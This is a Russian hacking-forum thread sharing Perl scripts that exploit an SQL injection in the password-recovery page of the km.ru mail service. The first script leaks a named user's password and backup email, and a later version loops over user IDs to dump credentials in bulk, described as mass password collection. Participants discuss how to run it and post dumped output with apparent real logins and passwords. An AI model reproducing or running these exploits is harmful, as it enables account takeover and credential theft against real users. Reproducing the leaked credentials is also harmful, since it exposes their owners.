Сплоит для km.ru =))

[system(#036;cmd)]

Спойлер: 20

#!/usr/bin/perl
use IO::Socket;

$login = $ARGV[1];
$domain = $ARGV[0];

print "\n(c)oded by system(\$cmd) // 24.08.2006\nSpecial for Web-Hack.ru\n--------------------------\n";
if (@ARGV < 2){
print "usage: perl km.pl domain login \n";
exit();
}

print "[+]Login - $login\n";
print "[+]Domain - $domain\n";
if ($domain=~/km.ru/){$domain=""}

$post="login=$login&domainname=$domain&secondOK=1";


$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "www.km.ru", PeerPort => "80") || die "\nCONNECTION FAILED";
print $sock "POST /reg/password.asp HTTP/1.1\r\n";
print $sock "Host: www.km.ru\r\n";
print $sock "Connection: close\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-length: ".length($post)."\r\n\r\n";
print $sock "$post";
print $sock "\r\n\r\n";

while (<$sock>)
{    
$a .= $_;
}
($nick,$host) = split(/\@/,$a);
($host,$trash) = split(/
/,$host);
($trash,$nick) = split(/адрес /,$nick);
$email="$nick\@$host";
if($email=~<\/option>)
{
print "[-]Mail does not exist or additional mail is not specified!\n";
#exit();
}
else
{
print "[+]Email - $email\n"
}
$post="email='%20or%201=convert(int,PassWord)%20and%20NickName='$login'--&nullOK=1";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "www.km.ru", PeerPort => "80") || die "\nCONNECTION FAILED";
print $sock "POST /reg/password.asp HTTP/1.1\r\n";
print $sock "Host: www.km.ru\r\n";
print $sock "Connection: close\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-length: ".length($post)."\r\n\r\n";
print $sock "$post";
print $sock "\r\n\r\n";

while (<$sock>)
{    
$a .= $_;
}
($pass,$trash) = split(/' to/,$a);
($trash,$pass) = split(/value '/,$pass);
print "[+]Passw - $pass";

:yahoo:

 

[madde]

короче объясняю как пользоваться и что он делает

ну запускать я думаю все умеют, далее вводим в строке запуска:

обращение к perl.exe km.pl*имя скрипта* @km.ru*домен на котором должна быть почта* madde*ник на который зарегана почта*


тоесть если почта madde@km.ru строка будет выгледеть вот так... все думаю ясно... дальше после запуска сплоит выдает альтернативное мыло... хз для чего нужно... а вот парооль не выдает, сейчас над этим работаю...
Добавлено в [time]1156750893[/time]
и пароль она получает, толлько при каких обстоятельствах не понятно

совет, не обязательно слушаться, поставь хайд хотя бы постов 20-30

 

[[br]]

http://rostnet.ru/phpBB2__/images/others/w00.html ) я тоже с ним мудохался

 

[madde]

в чем прикол он выдает какой то биты пароль...
Добавлено в [time]1156751213[/time]
из 10 проверенных выдал толкьо 1 верный пароль, 5 было блокд, 2 было неверных, 2 вообще не показало

 

[system(#036;cmd)]

Это уже хз.. пасс берет из базы.. но вот часто он не совпадает. Но если мыло 100 пудова юзаеца - то должно подходить

 

[madde]

Это уже хз.. пасс берет из базы.. но вот часто он не совпадает. Но если мыло 100 пудова юзаеца - то должно подходить

его или нету или оно не совпадает а нету случайно базы все ль кг у тебя

 

[[br]]

в поле мэил кривой инжекшн

 

[madde]

короче что нужно что бы сплоит выдернул мыло

нужно что бы мыло юзалось
нужно что бы пароль БЫЛ изменен в течении нескольких месяцев

 

[system(#036;cmd)]

Нет. ты неправ. Скрипт писал для себя, ибо забыл пасс от мыла =) Не юзалось где-то 1.5 года. Успешно восстановил =))

 

[madde]

Нет. ты неправ. Скрипт писал для себя, ибо забыл пасс от мыла =) Не юзалось где-то 1.5 года. Успешно восстановил =))

Нет. ты неправ. Скрипт писал для себя, ибо забыл пасс от мыла =) Не юзалось где-то 1.5 года. Успешно восстановил =))

у меня наоборот, создал мыло, попробывал-не восстанавливает, попробывал старое, восстановил, пасс сменил-опят не восстанавливает
Добавлено в [time]1156752111[/time]
короче там есть какой то период времени когда пас толи сменен должен snm толи наоборот, это 100%

 

[system(#036;cmd)]

Ну какая-то херня есть =)) как лягут звезды :lol2:

 

[madde]

system($cmd)


в вофрме быстрого ответа есть скрытый текст, нажимай на него-появются теги найд, и после первого хайд заменяй его на *[*SPOILER=20*]*


звездочки убери

 

[system(#036;cmd)]

лол. я терь сам невижу :lol2:

 

[system(#036;cmd)]

Спойлер: 20

#!/usr/bin/perl
use IO::Socket;

$toid = $ARGV[1];
$id = $ARGV[0];

print "\n(c)oded by system(\$cmd) // 24.08.2006\nSpecial for Web-Hack.ru\n----------------------------------\n";
if (@ARGV < 2){
print "usage: perl km.pl <=id =>id\n";
exit();
}
for($id;$id<=$toid;$id++){
print "[+]ID - $id\n";
$post="email='%20or%201=convert(int,NickName)%20and%20id=$id--&nullOK=1";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "www.km.ru", PeerPort => "80", Timeout => 5) || die "\nCONNECTION FAILED";
print $sock "POST /reg/password.asp HTTP/1.1\r\n";
print $sock "Host: www.km.ru\r\n";
print $sock "Connection: close\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-length: ".length($post)."\r\n\r\n";
print $sock "$post";
print $sock "\r\n\r\n";

while (<$sock>)
{    
$a .= $_;
}
($login,$trash) = split(/' to/,$a);
($trash,$login) = split(/value '/,$login);
print "[+]Login - $login\n";

$a='';

$post="email='%20or%201=convert(int,PassWord)%20and%20id=$id--&nullOK=1";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "www.km.ru", PeerPort => "80") || die "\nCONNECTION FAILED";
print $sock "POST /reg/password.asp HTTP/1.1\r\n";
print $sock "Host: www.km.ru\r\n";
print $sock "Connection: close\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-length: ".length($post)."\r\n\r\n";
print $sock "$post";
print $sock "\r\n\r\n";

while (<$sock>)
{    
$a .= $_;
}
($pass,$trash) = split(/' to/,$a);
($trash,$pass) = split(/value '/,$pass);
print "[+]Passw - $pass\n";
print "\n==================================\n";

}

Переделал шобы снимать дамп.. параметры: начальный-id конечный-id

 

[madde]

Переделал шобы снимать дамп.. параметры: начальный-id конечный-id

чуток не понял как теперь им пользоваться

 

[system(#036;cmd)]

Ну типа массовый сбор паролей =) perl km.pl 1 100

 

[madde]

Ну типа массовый сбор паролей =) perl km.pl 1 100

и куда все сохраняется,

 

[system(#036;cmd)]

Пока на экран выводица.. ща дорабатываю

 

[reD_ra#036;Ca1]

[ + ]ID - 100
[ + ]Login - evgeniy
[ + ]Passw - riboflavin

==================================
[ + ]ID - 101
[ + ]Login - riboflavin
[ + ]Passw - nikola

==================================
[ + ]ID - 102
[ + ]Login - nikola
[ + ]Passw - markuze

==================================
[ + ]ID - 103
[ + ]Login - markuze
[ + ]Passw - qwe1

==================================
[ + ]ID - 104
[ + ]Login - qwe1
[ + ]Passw - olga140870

==================================
[ + ]ID - 105
[ + ]Login - olga140870
[ + ]Passw - èèè

==================================

ты ничего не перепутал?

 

[madde]

и еще есть небольшые глюки, ну впрочем я думаю так почта выводит

[+]Login - &*241;&*242;&*229;&*235;&*235;&*224;
[+]Passw - &*241;&*242;&*229;&*235;&*235;&*224;

вместо * #

вот так иногда выводит вместо логина и пароля


+ можешь сделать так что бы все таки к шв писался домен к которому он пренадлежит плз, будет намного удобнееи альтернативное мыло плз оставь что бы выводилось